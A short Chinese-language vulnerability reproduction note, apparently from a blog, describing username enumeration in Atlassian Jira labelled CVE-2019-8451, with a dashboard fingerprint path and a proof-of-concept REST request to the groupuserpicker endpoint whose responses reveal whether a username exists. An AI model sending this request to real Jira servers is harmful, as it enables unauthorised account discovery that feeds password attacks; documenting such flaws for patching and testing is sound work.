(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举)

01描述

可通过接口的返回结果,对存在的用户进行枚举

02主面板截图

标识

/secure/Dashboard.jspa

(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举)

02 漏洞复现

POC:<name>为判断是否存在的用户名

/rest/api/latest/groupuserpicker?query=<name>&maxResults=50&showAvatar=false

不存用户提示
(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举)
存在用户提示
(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举)

不存在漏洞返回结果
(CVE-2019-8451) Atlassian Jira 信息泄露漏洞(用户名枚举)

上一篇:React17+React Hook+TS4 最佳实践 仿 Jira 企业级项目


下一篇:docker部署 jira